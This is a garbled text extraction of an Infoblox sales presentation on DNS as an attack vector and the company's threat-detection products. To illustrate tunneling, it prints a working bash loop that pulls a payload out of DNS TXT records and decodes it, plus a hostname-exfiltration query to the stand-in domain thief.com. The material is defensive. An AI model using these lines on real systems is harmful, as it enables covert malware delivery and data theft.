Professional Documents
Culture Documents
Infoblox Cibersecurity Strategy and HighWay 53
Infoblox Cibersecurity Strategy and HighWay 53
400+
VENDORS
4
4 || ©©2016
2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
The Security is Disconnected
5
5 || ©©2016
2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Incident Response Challenges
6
6 || ©©2016
2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Operational
Challenges
7
7 || ©©2016
2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Network and Security – Separate Teams with
Different Priorities
NETWORK TEAM SECURITY TEAM The Problems this Causes:
• Wastes resources for security and
9
9 || ©©2016
2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Gartner’s View on Silos
Silos between network, edge, endpoint and data
10 | |©©2016
10 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
DNS:
The Malware Control Plane
11 | | ©©2016
11 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
DNS - Leading Culprit for Data Exfiltration
One Byte is Too Much
$3.8M 46%
Average consolidated cost % of survey respondents
45%
% of survey respondents
of a data breach1 that experienced DNS data that experienced DNS
exfiltration2 tunneling2
Source: SC Magazine, Dec 2014, “DNS attacks putting organizations at risk, survey finds”
1. Source: Ponemon Institute, 2015 Cost of Data Breach Study 2. Source: SC Magazine, Dec 2014, “DNS attacks putting organizations at risk, survey finds”
12 | |©©2016
12 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
APT/Malware Proliferation Rooted in DNS
Easy to Let in, Touch to Get Out
91% 431M
Of malware uses DNS to New unique pieces of
#1
Malware C&C is #1
carry out campaigns1 malware in 20152 responsible vector for
crimeware3
• Intruders rely on DNS to infect devices, propagate malware and exfiltrate data
• Malware is designed to spread, morph and hide within your IT infrastructure
• Longer it takes to discover, the higher the cost of damage
1. Source: Cisco 2016 Annual Security Report 2. Symantec 2016 Internet Security Threat Report 3. Verizon 2016 Data Breach Investigations Report
13 | |©©2016
13 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
DNS is a top attack vector
DNS is vulnerable to attacks, and exploitations
Exfiltration
Other
DoS Attacks 8%
FTP
HTTP Other 7% DNS
9% 4% 45%
NTP
11% HTTP
40%
*Cloudmark 2014 report
DNS
76%
14 | |©©2016
14 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Malware Exploiting DNS
• Over 91% percent malware uses DNS
̶To gain command and control
̶To exfiltrate data
̶To redirect traffic
• Despite adversaries’ reliance on DNS, 68%
organizations do not monitor recursive DNS
• Advanced attacks and data breaches persist and
impact all sizes and types of organizations
• Average total cost of data breach ~$3.8M USD
• The question isn’t if, but when you will be
attacked, and how effectively you can respond
16 | |©©2016
16 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Exfiltrating Data via DNS Tunneling
• Uses DNS as a covert communication
channel to bypass firewalls Internet
IP
detection traffic
̶Iodine Client-side
tunnel program
̶OzymanDNS
̶SplitBrain
̶DNS2TCP
Slow DNS
17 | |©©2016
17 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Data Exfiltration over DNS
Syslog +12f(2354ayqv1asdf7s6ex.thief.com
Xc786asdf89xcbv897sadfjlw.thief.com
fityhkjDR65eUGYbjkUY6756.thief.com
nkjFYVW$%&(YBH$JKGHkjh.thief.com
Rogue DNS Server
om
f.c
hie
Data is listed on Darknet
x .t
6e
and sold for Bitcoin
f7s
sd
1a
qv
ay
54
23
2f(
+1
+12f(2354ayqv1asdf7s6ex
Xc786asdf89xcbv897sadfjlw
fityhkjDR65eUGYbjkUY6756
nkjFYVW$%&(YBH$JKGHkjh
Compromised
Endpoint
18 | |©©2016
18 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Malware Infiltration over DNS
"f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAUBpAAAA
AAABAAAAAAAAAAOCQAgAAAAAAAAAAAEAAOAAIA
EAAJQAiAAYAAAAFAAAAQAAAAAAAAABAAEAAAAAA
AEAAQAAAAAAAwAEAAAAAAADAAQAAAAAAAAgAA
AAAAAAAAwAAAAQAAAAAAgAAAAAAAAACQAAAAA
AAAAJAAAAA" Command
Quer
y
and
Rogue DNS for TX
Server T Control
update
DDNS
into TXT records
"f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAUBpAAAAAA
Query ABAAAAAAAAAAOCQAgAAAAAAAAAAAEAAOAAIAEAAJ
for TXT QAiAAYAAAAFAAAAQAAAAAAAAABAAEAAAAAAAEAAQA
AAAAAAwAEAAAAAAADAAQAAAAAAAAgAAAAAAAAAAw
AAAAQAAAAAAgAAAAAAAAACQAAAAAAAAAJAAAAA"
19 | |©©2016
19 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
DNS Infiltration = Malware code acquisition
Downloader Script 4 TXT records
#!/bin/bash 23212f62696e2f62617368206572726f723d5c273b
error=';; connection timed out; no servers could be 3b20636f6e6e656374696f6e2074696d6564206f75
reached' 743b206e6f207365727665727320636f756c64206
i=0 26520726561636865645c2720693d30206563686f
echo ''> output.b64 205c275c273e206f75747075742e6236
while :
do 34207768696c65203a20646f202020524553503d6
RESP=`dig +short $i.$1 TXT | cut -d'"' -f 2` 0646967202b73686f72742024692e243120545854
if [ "$RESP" = "$error" ]; 207c20637574202d645c275c225c27202d662032
then 602020206966205b205c2224524553505c22203d
echo "Timeout - done" 205c22246572726f725c22205d3b202020
break
fi 7468656e20202020206563686f205c2254696d656
echo -ne $RESP >> output.b64 f7574202d20646f6e655c22202020202062726561
echo $RESP 6b20202066692020206563686f202d6e652024524
i=$((i+1)) 55350203e3e206f75747075742e62363420202065
63686f202452455350202020693d2428
done
cat output.b64 | base64 -d > output
28692b31292920646f6e6520636174206f7574707
5742e623634207c20626173653634202d64203e2
06f7574707574
20 | |©©2016
20 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
DNS Exfiltration = Command and Control
Signaling and Control responses with DNS
hostname | xxd -p
Query A -> 6a75747465722d6d62702e6c6f63616c0a.thief.com
21 | |©©2016
21 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Security in Layers, What About DNS or GDPR?
DNS is Coverage? YES with Infoblox
App Offerings
Salesforce.com
Office 365
Workday – HR
SAP
Firewall/NGFW
Your SIEM Solution
• Centralized logging and reporting
IPS/IDS
22 | |©©2016
22 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Motion of Malware through Networks: “PIE”
APT/malware uses DNS at every stage
P Penetration
Query malicious domains
and report to C&C I Infection
Download malware to
the infected host E Exfiltration
Transport the data
offsite
DNS
server
23 | |©©2016
23 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Breaking the Security GAP:
25 | |©©2016
25 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
ActiveTrust Service®
Infoblox Threat
Infoblox Threat Intelligence
Infoblox DNS
Insight in the Data Exchange Infoblox Dossier
Firewall
Cloud / On-Prem (TIDE)
27 | |©©2016
27 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Active Trust - Threat Intelligence (Actionable!)
• “Feeds” only block access
Phishing
̶ Cause of the problem is still there!
Botnets
SPAM ̶ Still require analysts to identify
IPs ActiveTrust TIDE
Size, Scope, Severity
̶ Still require them to find and clean
URLs
the device
• Local intelligence (context) allows you
to start automating the analysis and
Infoblox Threat
Intelligence mitigation
Feed NAC
- Base
Malwar
e
̶ It now becomes ”Actionable
DLP
- Malware
WAF Intelligence”
- Ransomware
IPS
NGFW • Finally, there are many feeds
• Device IP address
FEEDs
Feed(s) • Device MAC address
FW ̶ Each specializes in something
• Device type
• Device host name
̶ There is very little overlap
Infoblox DDI
Platform • Device lease history ̶ As customers’ security capability
• User Logged
User-defined • Device localization matures, they use more and more
Other Vendor • Device Metadata
Feed
RPZ behaviors
28 | |©©2016
28 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Infoblox TIDE – External Threat Feeds
Solution Overview
Infoblox supplements ActiveTrust
threat data with threat data from
third-party sources by allowing that
data to be managed from within
Infoblox TIDE.
Benefits
1. Eliminate cost of onboarding
Infoblox additional third-party data
TIDE 2. Maximize resources by giving
back time to the security operations
and threat intelligence team
29 | |©©2016
29 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Infoblox TIDE/Dossier IOC loockups
ActiveTrust® - Threat Intelligence Providers
Solution overview:
Infoblox TIDE solution allows customers to
send TIDE and Dossier lookup requests,
enabling customers to break silos of
security tools and facilitating effective
protection for both the network and
XML JSON STIX CSV
endpoint domains.
Benefits:
1. Visibility across both network and
IOC lookups
endpoint domains.
2. Remediation and policy actions enabling
faster response to threats
Phishing &
SURBL Malware URLs Various
TIDE file
Marketplace Define Data Spambot IPs formats
Policy,
Governance & C&C & Malware
Custom TI Translation Host/Domain
31 | |©©2016
31 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
How The Streaming DNS Threat Insight Works
Detects sophisticated data exfiltration techniques
that don’t have well-known signatures (zero day)
1.Looks at TXT records, A, AAAA records
2.Detects presence of data using lexical and Entropy
temporal analysis
3.Certain attributes add to a threat score,
others subtract from it Size Lexical
Analysis
4.Final score classifies a request as exfiltration
or not Model
5.If exfiltration is found, automatically adds
destinations to special internal RPZ feed Frequency N-Gram
Solution
Benefits
34 | |©©2016
34 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Easing Operational
Challenges
36 | |©©2016
36 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
What Infoblox can provide…
Supporting the ecosystem…
37 | |©©2016
37 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
The DDI Data Gold Mine
DHCP IPAM DNS
Device Audit Trail Application and Activity Audit Trail
and Fingerprinting Business Context
A DHCP assignment signals Fixed IP addresses are typically DNS query data provides a
the insertion of a device on to assigned to high value devices: “client-centric” record of
the network activity
• Data center servers, network
• Includes context: Device info, devices, etc. • Includes internal activity
MAC, lease history inside the security perimeter
• IPAM provides “metadata” via
• DHCP is an audit trail of Extended Attributes: Owner, • Includes BYOD and IoT
devices on the network app, security level, location, devices
ticket number
• This provides an excellent
• Context for accurate risk basis to profile device & user
assessment and event activity
prioritization
38 | |©©2016
38 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Infoblox NGDDI, Most Accurate Information
Authoritative Network Database
What IP? DHCP Service / Discovery
ONE SHOT
What has
When Appear? Allocate / Discovery / Cloud happened in the
past?
Which MAC ? DHCP or Discovery
IP, User, hostname,
Device Type? DHCP Fingerprint RPZ, lease…
DNS hostname? DNS + DDNS updates Ecosystem Activity?
User Behind? AD user Identity Mapping
Tracking History?
Where is It? Network Insight / Cloud IPAM
Application and
Business Context
IPAM • “Metadata” via Extended Attributes:
Owner, app, security level, location,
ticket number
41 | |©©2016
41 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
How can Infoblox
Help You Get
There
Infoblox
Actionable
Network
Intelligence
Delivers Control and
Security from the Core
42 | |©©2016
42 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.
Iberia SALES: Pre-SALES:
Joaquín Gómez Jose Canelada
jgomez@infoblox.com jcanelada@infoblox.com
+34 670 499 348 +34 678 534 519
Q&A
Muchas Gracias
¿Preguntas?
43 | |©©2016
43 2013 Infoblox
Infoblox Inc. AllInc. AllReserved.
Rights Rights Reserved.